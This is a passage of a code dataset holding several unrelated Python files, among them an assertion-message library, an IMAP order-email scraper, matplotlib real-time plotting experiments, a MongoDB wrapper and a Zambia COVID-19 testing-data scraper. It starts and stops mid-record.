node.left))\n for idx, operator, comparator in zip(\n range(len(node.ops)), node.ops, node.comparators\n ):\n op = type(operator)\n func = self._compare_ops[op]\n right = self.visit(comparator)\n op_result = func(left, right)\n if idx > 0:\n result = result and op_result\n else:\n result = op_result\n if not isinstance(comparator, self._simple):\n self.nodes.append((right, comparator))\n _operator = copy.copy(operator)\n _operator.lineno, _operator.col_offset = self._find_operator(\n op, comparator.lineno, comparator.col_offset\n )\n self.nodes.append(\n (self.FuncResult(self._diff(op, op_result, left, right)), _operator)\n )\n left = right\n return result\n\n def visit_Attribute(self, node):\n value = self.visit(node.value)\n self.nodes.append((value, node))\n res = getattr(value, node.attr)\n self.nodes.append((self.FuncResult(res), node))\n return res\n\n def visit_Call(self, node):\n if isinstance(node.func, ast.Name):\n name = node.func.id\n else:\n name = self.visit(node.func)\n\n if callable(name):\n func = name\n elif name in self.f_locals:\n func = self.f_locals[name]\n elif name in self.f_globals:\n func = self.f_globals[name]\n elif getattr(builtins, name):\n func = getattr(builtins, name)\n else:\n raise NameError(\n \"Function '{}' is not defined\".format(name),\n node.lineno,\n node.col_offset,\n )\n\n if isinstance(func, values):\n if func.stack:\n result = func.stack.pop(0)\n else:\n result = None\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n starred = []\n args = []\n for arg in node.args:\n if isinstance(arg, ast.AST):\n arg_value = self.visit(arg)\n if not isinstance(arg, self._simple):\n self.nodes.append((arg_value, arg))\n args.append(arg_value)\n\n if args and isinstance(args[-1], ast.Starred):\n starred = args.pop(-1).value\n\n keywords = {}\n for keyword in node.keywords:\n keyword_value = self.visit(keyword.value)\n keywords[keyword.arg] = keyword_value\n if not isinstance(keyword.value, self._simple):\n self.nodes.append((keyword_value, keyword.value))\n\n value = func(*args, *starred, **keywords)\n self.nodes.append((self.FuncResult(value), node))\n return value\n\n def visit_Starred(self, node):\n result = self.visit(node.value)\n return ast.Starred(result, node.ctx)\n\n def visit_BinOp(self, node):\n op = type(node.op)\n func = self._binary_ops[op]\n left = self.visit(node.left)\n if not isinstance(node.left, self._simple):\n self.nodes.append((left, node.left))\n right = self.visit(node.right)\n if not isinstance(node.right, self._simple):\n self.nodes.append((right, node.right))\n result = func(left, right)\n _operator = copy.copy(node.op)\n _operator.lineno, _operator.col_offset = self._find_operator(\n op, node.right.lineno, node.right.col_offset\n )\n self.nodes.append((self.FuncResult(result), _operator))\n return result\n\n def visit_UnaryOp(self, node):\n op = type(node.op)\n func = self._unary_ops[op]\n operand = self.visit(node.operand)\n if not isinstance(node.operand, self._simple):\n self.nodes.append((operand, node.operand))\n result = func(operand)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_IfExp(self, node):\n body = self.visit(node.body)\n if not isinstance(node.body, self._simple):\n self.nodes.append((body, node.body))\n test = self.visit(node.test)\n if not isinstance(node.test, self._simple):\n self.nodes.append((test, node.test))\n orelse = self.visit(node.orelse)\n if not isinstance(node.orelse, self._simple):\n self.nodes.append((orelse, node.orelse))\n result = body if test else orelse\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_BoolOp(self, node):\n op = type(node.op)\n operator = node.op\n func = self._boolean_ops[op]\n\n left = self.visit(node.values[0])\n if not isinstance(node.values[0], self._simple):\n self.nodes.append((left, node.values[0]))\n\n for value in node.values[1:]:\n right = self.visit(value)\n if not isinstance(value, self._simple):\n self.nodes.append((right, value))\n result = func(left, right)\n _operator = copy.copy(operator)\n _operator.lineno, _operator.col_offset = self._find_operator(\n op, value.lineno, value.col_offset\n )\n self.nodes.append((self.FuncResult(result), _operator))\n left = result\n return result\n\n def visit_Tuple(self, node):\n result = []\n for e in node.elts:\n v = self.visit(e)\n if not isinstance(e, self._simple):\n self.nodes.append((v, e))\n result.append(v)\n result = tuple(result)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_Set(self, node):\n result = []\n for e in node.elts:\n v = self.visit(e)\n if not isinstance(e, self._simple):\n self.nodes.append((v, e))\n result.append(v)\n result = set(result)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_List(self, node):\n result = []\n for e in node.elts:\n v = self.visit(e)\n if not isinstance(e, self._simple):\n self.nodes.append((v, e))\n result.append(v)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_Dict(self, node):\n keys = []\n for k in node.keys:\n v = self.visit(k)\n if not isinstance(k, self._simple):\n self.nodes.append((v, k))\n keys.append(v)\n values = []\n for value in node.values:\n v = self.visit(value)\n if not isinstance(value, self._simple):\n self.nodes.append((v, value))\n values.append(v)\n result = dict(zip(keys, values))\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def generic_visit(self, node):\n # some expressions like comprehensions will have their\n # own local scope so therefore we combine globals and locals\n # scopes into one globals scope\n f_globals = self.f_globals.copy()\n f_globals.update(self.f_locals)\n if isinstance(node, ast.expr):\n bytecode = compile(ast.Expression(node), \"assertion node\", \"eval\")\n return eval(bytecode, f_globals)\n elif isinstance(node, ast.stmt):\n bytecode = compile(ast.Module([node]), \"assertion node\", \"exec\")\n return exec(bytecode, f_globals)\n return super(AssertEval, self).generic_visit(node)\n\n\ndef _code_block(filename, lineno, before=8, after=4):\n \"\"\"Retrieve code blocks around a given line\n inside the source.\n\n :param filename: name of the source file\n :param lineno: line number\n :param before: number of lines before the line number\n :param after: number of line after the line number\n \"\"\"\n min_n = max(lineno - before, 0)\n max_n = lineno + after\n\n line_fmt = \"%\" + str(len(str(max_n))) + \"d| %s\"\n lines = []\n\n for n in range(min_n, max_n):\n line = linecache.getline(filename, n)\n if n > min_n and len(line) == 0:\n break\n print_line = line_fmt % (n, line)\n if n == lineno:\n print_line = \"|> \".join(print_line.split(\"| \", 1))\n lines.append(print_line)\n\n return lines\n\n\nclass error(object):\n \"\"\"Error object that generates a descriptive\n error message when assert fails.\n\n :param desc: description, default: `None`\n :param frame: frame, default: `None`\n :param frame_info: frame info, default: `None`\n :param expression: expression, default: `None`\n :param nodes: a list of expression value nodes, default: `None`\n :param expression_section: a flag to include an expression section\n that lists the assert expression, default: `True`\n :param description_section: a flag to include a description section\n that shows custom description message, default: `True`\n :param values_section: a flag to include a values section\n that shows the values of the assert expression, default: `True`\n :param where_section: a flag to include a where section\n that shows source code where assert expression is found, default: `True`\n \"\"\"\n\n def __init__(\n self,\n desc=None,\n frame=None,\n frame_info=None,\n expression=None,\n nodes=None,\n expression_section=True,\n description_section=True,\n values_section=True,\n where_section=True,\n ):\n self.frame = frame\n if self.frame is None:\n self.frame = inspect.currentframe().f_back\n self.frame_info = frame_info\n if self.frame_info is None:\n self.frame_info = inspect.getframeinfo(self.frame)\n self.desc = str(desc) if desc is not None else None\n self.nodes = list(nodes) if nodes is not None else None\n self.expression = str(expression) if expression is not None else None\n self.expression_section = expression_section\n self.description_section = description_section\n self.values_section = values_section\n self.where_section = where_section\n self.message = self.generate()\n\n def __str__(self):\n return self.message\n\n def generate(self):\n \"\"\"Re-evaluate assertion statement and\n generate an error message.\n \"\"\"\n if self.nodes is None:\n self.expression, self.nodes = AssertEval(self.frame, self.frame_info).eval()\n return self.generate_message()\n\n def generate_expression_section(self):\n \"\"\"Return expression section.\"\"\"\n section = \"\"\n if self.expression_section and self.expression:\n section += \"\\n\\nThe following assertion was not satisfied\"\n for line in self.expression:\n section += \"\\n \" + line\n return section\n\n def generate_description_section(self):\n \"\"\"Return description section.\"\"\"\n section = \"\"\n if self.description_section and self.desc:\n section += \"\\n\\nDescription\"\n section += \"\\n \" + self.desc[0].capitalize() + self.desc[1:]\n return section\n\n def generate_values_section(self):\n \"\"\"Return values section.\"\"\"\n section = \"\"\n if self.values_section and self.nodes:\n section += \"\\n\\nAssertion values\"\n for v, n in self.nodes:\n for i, line in enumerate(self.expression):\n section += \"\\n \" + line\n if n.lineno == i + 1:\n col_offset = n.col_offset\n if col_offset < 0:\n col_offset = len(line) - len(line.lstrip())\n section += \"\\n \" + \" \" * col_offset + \"^ is \" + _saferepr(v)\n return section\n\n def generate_where_section(self):\n \"\"\"Return where section.\"\"\"\n section = \"\"\n if self.where_section and self.frame_info.code_context:\n section += \"\\n\\nWhere\"\n section += \"\\n File '%s', line %d in '%s'\" % (\n self.frame_info.filename,\n self.frame_info.lineno,\n self.frame_info.function,\n )\n\n section += \"\\n\\n\" + \"\".join(\n self.code_block(self.frame_info.filename, self.frame_info.lineno)\n )\n return section\n\n def generate_message(self):\n \"\"\"Generate an error message.\n\n :param expression: expression\n :param frame_info: frame info\n \"\"\"\n message = \"Oops! Assertion failed\"\n message += self.generate_expression_section()\n message += self.generate_description_section()\n message += self.generate_values_section()\n message += self.generate_where_section()\n return message\n\n def code_block(self, filename, lineno, before=8, after=4):\n \"\"\"Retrieve code blocks around a given line\n inside the source.\n\n :param filename: name of the source file\n :param lineno: line number\n :param before: number of lines before the line number\n :param after: number of line after the line number\n \"\"\"\n min_n = max(lineno - before, 1)\n max_n = lineno + after\n\n line_fmt = \"%\" + str(len(str(max_n))) + \"d| %s\"\n lines = []\n\n for n in range(min_n, max_n):\n line = linecache.getline(filename, n)\n if n > min_n and len(line) == 0:\n break\n print_line = line_fmt % (n, line)\n if n == lineno:\n print_line = \"|> \".join(print_line.split(\"| \", 1))\n lines.append(print_line)\n\n return lines\n\n\nclass errors(object):\n \"\"\"Context manager that can be used\n to wrap multiple assert statements.\n \"\"\"\n\n class softerror(object):\n \"\"\"Context manager that is used\n to wrap soft assertion.\n\n :param errors: list to which an exception will be added\n \"\"\"\n\n def __init__(self, errors):\n self.errors = errors\n\n def __enter__(self):\n pass\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if isinstance(exc_val, AssertionError):\n frame = inspect.currentframe().f_back\n frame_info = inspect.getinnerframes(exc_tb)[-1]\n desc = None\n if exc_val.args:\n if isinstance(exc_val.args[0], error):\n return\n desc = str(exc_val)\n exc_val.args = (error(desc=desc, frame=frame, frame_info=frame_info),)\n self.errors.append(exc_val)\n return True\n\n def __init__(\n self,\n expression_section=True,\n description_section=True,\n values_section=True,\n where_section=True,\n ):\n self.errors = []\n self.expression_section = expression_section\n self.description_section = description_section\n self.values_section = values_section\n self.where_section = where_section\n\n def __str__(self):\n errs = []\n for err in self.errors:\n err = err.args[0]\n err.expression_section = self.expression_section\n err.description_section = self.description_section\n err.values_section = self.values_section\n err.where_section = self.where_section\n errs.append(err.generate_message())\n return \"\\n\\nas well as the following assertion\\n\\n\".join(errs)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if isinstance(exc_val, AssertionError):\n frame = inspect.currentframe().f_back\n frame_info = inspect.getinnerframes(exc_tb)[-1]\n desc = None\n if exc_val.args:\n if isinstance(exc_val.args[0], error):\n return\n desc = str(exc_val)\n exc_val.args = (error(desc=desc, frame=frame, frame_info=frame_info),)\n if self.errors:\n self.errors.append(exc_val)\n elif isinstance(exc_val, Exception):\n return\n\n if self.errors:\n raise AssertionError(self) from None\n\n def error(self):\n \"\"\"Return an instance of the soft\n error context manager.\n \"\"\"\n return self.softerror(self.errors)\n\n\ndef _saferepr(value):\n try:\n r = textwrap.indent(repr(value), \" \" * 2)\n return r.lstrip()\n except Exception as e:\n return \" (repr() failed with '%s')\" % str(e)\n","sub_path":"testflows/asserts/asserts.py","file_name":"asserts.py","file_ext":"py","file_size_in_byte":25290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"343024977","text":"import imapclient, pyzmail\n\nclass email_scr: \n\n def __init__(self):\n self.Client_Name = \"\"\n self.Order_No = 0\n self.Order_info = []\n self.Order_Details = \"\"\n self.Customer_email = \"\"\n self.Shipping_Details = \"\"\n self.Delivery_Meth = \"\"\n\n def toString(self):\n return str(\n \"Client Name: \" + self.Client_Name + \"\\n\"\n \"Order Number: \" + str(self.Order_No) + \"\\n\"\n \"Order Details: \" + self.Order_Details + \"\\n\" \n \"Shipping Number: \" + str(self.Shipping_No) + \"\\n\"\n \"Shipping Details: \" + self.Shipping_Details)\n\n def totup(self): \n email_tup = {self.Client_Name, self.Order_No, self.Order_Details, self.Shipping_No, self.Shipping_Details}\n return email_tup\n\n def parse_email(self, text_message):\n for i in text_message:\n if i == 'ORDER INFORMATION\\r':\n self.Order_info.append(text_message[i:i+15])\n elif i == 'Order #:':\n self.Order_No = i+1\n\n\n def login(self,email_val):\n email_reader = imapclient.IMAPClient('imap.gmail.com', ssl=True)\n email_reader.login( \"admin@nah.com\" , \"nmope\")\n\n email_reader.select_folder('INBOX', readonly=True)\n \n \n UIDs = email_reader.search(['SINCE','24-Apr-2020'])\n rawMessages = email_reader.fetch(UIDs, ['BODY[]'])\n message = pyzmail.PyzMessage.factory(rawMessages[UIDs[email_val]][b'BODY[]'])\n if message.get_subject() == 'NICE! YOU JUST GOT AN ORDER':\n message_text = message.text_part.get_payload().decode(message.text_part.charset)\n text_list = message_text.split('\\n')\n print(text_list)\n return parse_email(text_list)\n\n else:\n return 'done'\n","sub_path":"python/email_app/email_scr.py","file_name":"email_scr.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"433350070","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 03/04/2016\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\n__author__ = 'Nathan Starkweather'\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nimport matplotlib.pyplot as plt\nimport matplotlib.figure\nimport matplotlib.animation as anim\nimport numpy as np\n\n\ndef main():\n f = plt.figure()\n ax = f.add_subplot(1, 1, 1)\n x_data = np.arange(2*np.pi, step=2*np.pi / 100)\n sin_arg = x_data\n print(sin_arg)\n y_data = np.sin(sin_arg)\n line = ax.plot(x_data, y_data)[0]\n # f.show()\n i = 0\n # plt.show(False)\n # plt.draw()\n bkgd = f.canvas.copy_from_bbox(ax.bbox)\n from time import sleep, time\n f.show()\n start = time()\n for i in range(1000):\n x = x_data * i / 2\n y = np.sin(x)\n # print(x)\n line.set_data(x_data, y)\n f.canvas.restore_region(bkgd)\n f.draw_artist(ax)\n f.canvas.blit(ax.bbox)\n f.canvas.flush_events()\n end = time()\n print(\"FPS: %s\" % (1000 / (end - start)))\nfrom math import sin\n\nimport itertools\n\ndef iterdata():\n step = np.pi / 100\n xi = itertools.cycle(i * step for i in range(1000))\n while True:\n x = next(xi)\n y = sin(x)\n yield x, y\n\n\nimport collections\nimport threading\nfrom time import sleep\n\n\nclass SimpleRTPlot():\n \"\"\" Simple interface to a real-time plot based on matplotlib.\n Intended primarily as a learning tool to understand the basics of matplotlib.\n Extensive comments may be used as a result.\n \"\"\"\n\n def __init__(self, x_data=(), y_data=(), max_pts=None, style='ggplot'):\n\n # plots expect data to be np arrays\n # but np arrays can't be appended to\n # resulting in O(n^2) behavior\n # so store data python objects instead.\n\n # deque is used to more easily and efficiently\n # work with arbitrary limits on the total number\n # of data points\n\n # data is stored in separate containers for x and y\n # data, because that's how the plotting interface\n # works.\n\n x_data = collections.deque(x_data, max_pts)\n y_data = collections.deque(y_data, max_pts)\n\n self.x_data = x_data\n self.y_data = y_data\n self.max_pts = max_pts\n self.style = style\n\n self.clear_pyplot()\n\n self.data_lock = threading.RLock()\n self.pyplot_lock = threading.RLock()\n self.setup_complete = threading.Event()\n self.shutdown_complete = threading.Event()\n self.new_data = False\n self.stop_loop = False\n self.plot_thread = None\n self._init()\n\n def _init(self):\n self.thread_target = self.threadloop\n\n def clear_pyplot(self):\n self.figure = None\n self.subplot = None\n self.background = None\n self.line = None\n\n def setup_pyplot(self):\n plt.style.use(self.style)\n\n num = None\n figsize = None\n dpi = None\n facecolor = None\n edgecolor = None\n frameon = True\n fig_klass = matplotlib.figure.Figure\n\n # self.figure = plt.figure(num, figsize, dpi, facecolor, edgecolor, frameon, fig_klass)\n self.figure = plt.figure()\n self.subplot = self.figure.add_subplot(1, 1, 1)\n self.line, = self.subplot.plot(self.x_data, self.y_data)\n self.background = self.figure.canvas.copy_from_bbox(self.subplot.bbox)\n self.figure.show()\n # self.figure.draw()\n\n def show(self):\n self.clear_pyplot()\n self.setup_complete.clear()\n self.shutdown_complete.clear()\n\n self.plot_thread = threading.Thread(None, self.thread_target, daemon=True)\n self.plot_thread.start()\n self.setup_complete.wait()\n\n def add_data(self, x, y):\n with self.data_lock:\n self.x_data.append(x)\n self.y_data.append(y)\n self.notify_new_data()\n\n def notify_new_data(self):\n self.new_data = True\n\n def stop(self):\n self._shutdown_loop()\n self.shutdown_complete.wait()\n self.shutdown_complete.clear()\n self.setup_complete.clear()\n\n def _shutdown_loop(self):\n self.stop_loop = True\n self.plot_thread.join()\n self.plot_thread = None\n\n def extend_data(self, x_data, y_data):\n if len(x_data) != len(y_data):\n raise ValueError(\"Data must have same length!\")\n with self.data_lock:\n self.x_data.extend(x_data)\n self.y_data.extend(y_data)\n self.notify_new_data()\n\n def threadloop(self):\n self.setup_pyplot()\n self.setup_complete.set()\n while not self.stop_loop:\n with self.data_lock:\n if self.new_data:\n with self.pyplot_lock:\n self.new_data = False\n self.line.set_data(self.x_data, self.y_data)\n self.figure.canvas.restore_region(self.background)\n self.figure.draw_artist(self.subplot)\n self.figure.canvas.blit(self.subplot.bbox)\n self.subplot.autoscale_view()\n self.figure.canvas.flush_events()\n sleep(0.01)\n self.clear_pyplot()\n self.shutdown_complete.set()\n\n\nclass SimpleRTPlot2(SimpleRTPlot):\n\n def _init(self):\n self.thread_target = self._threadloop2\n\n def notify_new_data(self):\n self.figure.canvas.stop_event_loop()\n\n def _shutdown_loop(self):\n self.stop_loop = True\n self.figure.canvas.stop_event_loop()\n self.plot_thread.join()\n self.plot_thread = None\n\n def _threadloop2(self):\n self.setup_pyplot()\n # start with event loop running\n self.figure.canvas.start_event_loop(1)\n\n while not self.stop_loop:\n with self.data_lock:\n self.line.set_data(self.x_data, self.y_data)\n with self.pyplot_lock:\n self.figure.canvas.restore_region(self.background)\n self.figure.draw_artist(self.subplot)\n self.figure.canvas.blit(self.subplot.bbox)\n self.subplot.autoscale_view()\n self.figure.canvas.start_event_loop(1)\n self.clear_pyplot()\n\n\nfrom tkinter import TclError\nfrom time import time\n\n\nclass SimpleRTPlot3(SimpleRTPlot):\n def show(self):\n self.setup_pyplot()\n self.last_update = time()\n def flush(flushfunc):\n while True:\n flushfunc()\n threading.Thread(None, flush, None, (self.figure.canvas.flush_events,), daemon=True).start()\n\n def notify_new_data(self):\n self.line.set_data(self.x_data, self.y_data)\n self.figure.canvas.restore_region(self.background)\n self.figure.draw_artist(self.subplot)\n try:\n self.figure.canvas.blit(self.subplot.bbox)\n except TclError:\n return\n # if time() - self.last_update > 1:\n # self.figure.canvas.flush_events()\n # self.last_update = time()\n\n\ndef main2():\n\n plot = SimpleRTPlot3(max_pts=20)\n data = iterdata()\n plot.show()\n plot.subplot.set_ylim(-1, 1, True)\n plot.subplot.set_xlim(0, np.pi * 5, True)\n frames = 0\n start = time()\n while True:\n x, y = next(data)\n plot.add_data(x, y)\n frames += 1\n print(\"\\rFPS: %s\" % (frames / (time() - start)), end=\"\")\n\n\n\nif __name__ == '__main__':\n # main2()\n pass\n","sub_path":"archive/toys/plot_stuff.py","file_name":"plot_stuff.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"325775645","text":"import pickle\nimport pandas as pd\n\n\n\n\ndef load_models(log_writer,file_object):\n log_writer.log(file_object, 'Starting to load models')\n with open(\"models/modelForPrediction.sav\", 'rb') as f:\n model = pickle.load(f)\n return model\n\ndef preprocess_data(final_df, log_writer,file_object):\n gender = {'male': 0, 'female': 1}\n final_df.Sex = [gender[item] for item in final_df.Sex]\n log_writer.log(file_object, 'Coverted Sex to float object')\n return final_df\n\n\ndef predict_data(dict_pred, log_writer):\n\n #validate the data entered\n #preprocess to get X in sme format\n #then apply models to predict\n file_object = open(\"logs/PredictionLogs.txt\", 'a+')\n log_writer.log(file_object, 'Starting the predict data')\n\n model = load_models(log_writer,file_object)\n log_writer.log(file_object, 'Loading of models completed')\n final_df = pd.DataFrame(dict_pred, index = [1,])\n final_df = preprocess_data(final_df, log_writer,file_object)\n log_writer.log(file_object, 'Prepared the final dataframe')\n log_writer.log(file_object, 'Predicting the result')\n predict = model.predict(final_df)\n\n print('Class is: ', predict[0])\n log_writer.log(file_object, 'Prediction completed')\n log_writer.log(file_object, '=================================================')\n return predict[0]\n\n\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494597076","text":"from motor.motor_asyncio import AsyncIOMotorClient, AsyncIOMotorDatabase, AsyncIOMotorCollection\nfrom bson.objectid import ObjectId\nfrom mongo.models import Result, Counter\n\n\nclass AsyncDatabase:\n client: AsyncIOMotorClient = None\n database: AsyncIOMotorDatabase = None\n counters_collection: AsyncIOMotorCollection = None\n results_collection: AsyncIOMotorCollection = None\n\n def __init__(self, connection_uri: str, database_name: str):\n self.connection_uri = connection_uri\n self.database_name = database_name\n\n def connect_to_database(self):\n self.client = AsyncIOMotorClient(self.connection_uri)\n self.database = self.client[self.database_name]\n self.counters_collection = self.database.get_collection('counters')\n self.results_collection = self.database.get_collection('results')\n\n def close_database_connection(self):\n self.database.close()\n\n async def add_counter(self, counter: Counter) -> Counter:\n resp = await self.counters_collection.insert_one(counter.dict())\n counter.id = resp.inserted_id\n return counter\n\n async def get_results(self, counter_id: str, time_from: int, time_to: int, with_top: bool = False) -> list:\n if ObjectId.is_valid(counter_id):\n query = {\n 'counter_id': counter_id,\n 'timestamp': {'$gte': time_from, '$lte': time_to}\n }\n projection = {\n '_id': 0,\n 'counter_id': 0,\n 'top_ads': 0\n }\n\n if with_top:\n projection.pop('top_ads')\n\n results = []\n async for result in self.results_collection.find(query, projection):\n results.append(result)\n return results\n return []\n","sub_path":"src/mongo/async_database.py","file_name":"async_database.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"333290043","text":"from django.conf.urls import url\n\nfrom . import views\napp_name = 'chat'\n\n\nurlpatterns = [\n url(r'^chat/$', views.Talk, name='chat'),\n\n url(r'^post/$', views.Post, name='post'),\n url(r'^messages/$', views.Messages, name='messages'),\n]","sub_path":"webapp/chat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"416450650","text":"\"\"\"Constructs daily time series of COVID-19 testing data for Zambia.\nArcGIS Dashboard: https://zambia-open-data-nsdi-mlnr.hub.arcgis.com/pages/zambia-covid19\n\"\"\"\n\nimport re\nimport json\nimport datetime\nimport requests\nimport pandas as pd\n\nCOUNTRY = 'Zambia'\nUNITS = 'tests performed'\nTESTING_TYPE = 'PCR only'\nSOURCE_LABEL = 'Government of Zambia'\nSOURCE_URL = 'https://zambia-open-data-nsdi-mlnr.hub.arcgis.com/pages/zambia-covid19'\nDATA_URL = 'https://services9.arcgis.com/ZNWWwa7zEkUIYLEA/arcgis/rest/services/service_d73fa15b0b304945a52e048ed42028a9/FeatureServer/0/query'\nPARAMS = {\n 'f': 'json',\n 'where': \"reportdt>=timestamp '2020-01-01 00:00:00'\",\n 'returnGeometry': False,\n 'spatialRel': 'esriSpatialRelIntersects',\n 'outFields': '*',\n 'orderByFields': 'reportdt asc',\n 'resultOffset': 0,\n 'resultRecordCount': 32000,\n 'resultType': 'standard',\n 'cacheHint': True,\n}\n\n# sample of official values for cross-checking against the API data.\nofficial_cumulative_totals = [\n (\"2020-09-03\", {\"cumulative_total\": 119567, \"source\": \"https://twitter.com/mohzambia/status/1301477446936678400\"}),\n (\"2020-08-08\", {\"cumulative_total\": 93344, \"source\": \"https://twitter.com/mohzambia/status/1292086483978014722\"}),\n (\"2020-08-06\", {\"cumulative_total\": 90307, \"source\": \"https://twitter.com/mohzambia/status/1291398767959322629\"}),\n (\"2020-07-30\", {\"cumulative_total\": 81482, \"source\": \"https://www.facebook.com/mohzambia/posts/1656823021159015\"}),\n (\"2020-07-29\", {\"cumulative_total\": 80239, \"source\": \"https://www.facebook.com/mohzambia/posts/1655960864578564\"}),\n (\"2020-07-28\", {\"cumulative_total\": 79269, \"source\": \"https://www.facebook.com/mohzambia/posts/1654985441342773\"}),\n (\"2020-05-07\", {\"cumulative_total\": 11412, \"source\": \"https://twitter.com/mohzambia/status/1258424347011756033\"}),\n (\"2020-04-30\", {\"cumulative_total\": 6828, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/05/Zambia_COVID-Situational-Report-No-43_30April20_Final.pdf\"}),\n (\"2020-04-09\", {\"cumulative_total\": 1314, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-22_09April20_Final.pdf\"}),\n (\"2020-04-08\", {\"cumulative_total\": 1222, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-21_08April20_Final.pdf\"}),\n (\"2020-04-07\", {\"cumulative_total\": 1087, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-20_07April20_Final.pdf\"}),\n (\"2020-03-31\", {\"cumulative_total\": 520, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-13_310320_Final.pdf\"}),\n (\"2020-03-22\", {\"cumulative_total\": 75, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/03/Zambia_COVID-Situational-Report-No-4_220320_final.pdf\"}),\n]\n\ndef main() -> None:\n df = get_data()\n df = df.sort_values('Date')\n df['Country'] = COUNTRY\n df['Units'] = UNITS\n df['Testing type'] = TESTING_TYPE\n df['Source URL'] = SOURCE_URL\n df['Source label'] = SOURCE_LABEL\n df['Notes'] = \"\"\n sanity_checks(df)\n df = df[['Country', 'Units', 'Testing type', 'Date', 'Cumulative total', 'Source URL', 'Source label', 'Notes']]\n df.to_csv(\"automated_sheets/Zambia.csv\", index=False)\n\ndef get_data() -> pd.DataFrame:\n res = requests.get(DATA_URL, params=PARAMS)\n assert res.ok\n json_data = json.loads(res.text)\n df = pd.DataFrame([feat['attributes'] for feat in json_data['features']])\n df['reportdt'] = df['reportdt'].astype(int).apply(lambda dt: datetime.datetime.utcfromtimestamp(dt/1000))\n df = df.rename(columns={'totalTests': 'Cumulative total'})\n df['Cumulative total'] = df['Cumulative total'].astype(int)\n # KLUDGE: there are a few days with two reports on the same day (but at \n # different times, like 10am vs 10pm). Upon inspection, it appears that the \n # latter reports (e.g. the 10pm reports) actually correspond to official cumulative\n # totals for the subsequent day (as determined by comparing to official updates\n # published on Twitter and Facebook). So I increment the date of these latter \n # reports by one.\n df = df.sort_values('reportdt')\n duplicate_idx = df.index[df['reportdt'].dt.date.duplicated(keep='first')]\n # df.loc[df['reportdt'].dt.date.duplicated(keep=False), ['reportdt', 'Cumulative total', 'test24hours']]\n for idx in duplicate_idx:\n df.loc[idx, 'reportdt'] = df.loc[idx, 'reportdt'] + datetime.timedelta(days=1)\n df['Date'] = df['reportdt'].dt.strftime('%Y-%m-%d')\n # df.loc[df['Date'].duplicated(keep=False), ['Date', 'reportdt', 'Cumulative total', 'test24hours']]\n # df.loc[(df['Date'] >= '2020-08-06') & (df['Date'] <= '2020-08-09'), ['Date', 'reportdt', 'Cumulative total', 'test24hours']]\n df = df[['Date', 'Cumulative total']]\n df = df[df[\"Cumulative total\"] > 0]\n df = df.groupby(\"Cumulative total\", as_index=False).min()\n df = df.groupby(\"Date\", as_index=False).min()\n return df\n\ndef sanity_checks(df: pd.DataFrame) -> None:\n \"\"\"checks that there are no obvious errors in the scraped data.\n \"\"\"\n # checks that there are no duplicate dates\n assert df['Date'].duplicated().sum() == 0, 'One or more rows have a duplicate date.'\n # checks that the cumulative number of tests on date t is always greater than the figure for t-1:\n assert (df['Cumulative total'].iloc[1:] >= df['Cumulative total'].shift(1).iloc[1:]).all(), \"On one or more dates, `Cumulative total` is greater on date t-1.\"\n # cross-checks a sample of scraped figures against the expected result.\n assert len(official_cumulative_totals) > 0\n for dt, d in official_cumulative_totals:\n val = df.loc[df['Date'] == dt, 'Cumulative total'].squeeze().sum()\n assert val == d['cumulative_total'], f\"scraped value ({val:,d}) != official value ({d['cumulative_total']:,d}) on {dt}\"\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/scripts/testing/automations/zambia.py","file_name":"zambia.py","file_ext":"py","file_size_in_byte":5968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469854227","text":"'''\nquick and dirty C API wrappers\n- basic error checking, memory cleanups, and type inference\n- imperative interface, still receives pointer object\n- this sub-module shall be easily portable to C, allowing future speedups\n'''\nfrom ctypes import *\nimport codecs\n\nfrom .wsdefs import *\nfrom . import naked\n\n# ==== utils\nclass BaseWSTPError(RuntimeError):\n def __init__(self, errno_, msg=''):\n '''\n Args:\n errno_: int\n msg: str\n '''\n self.errno = errno_\n self.msg = msg\n\n def __repr__(self):\n if self.msg:\n return '%s(%d, \"%s\")' % (\n type(self).__name__, self.errno, self.msg)\n else:\n return '%s(%d)' % (type(self).__name__, self.errno)\n\n def __str__(self):\n return self.__repr__()\n\nclass WSTPError(BaseWSTPError):\n '''\n Contains WSTP error code, and optionally a message\n\n For this class, error code should be one of WSE* from wstp.h\n '''\n pass\n\nclass WSTPTempLoopbackLink:\n '''\n Instantiated by WSTPTempLoobackContext\n '''\n __slots__ = ('penv', 'plnk')\n def __init__(self, penv):\n self.penv = 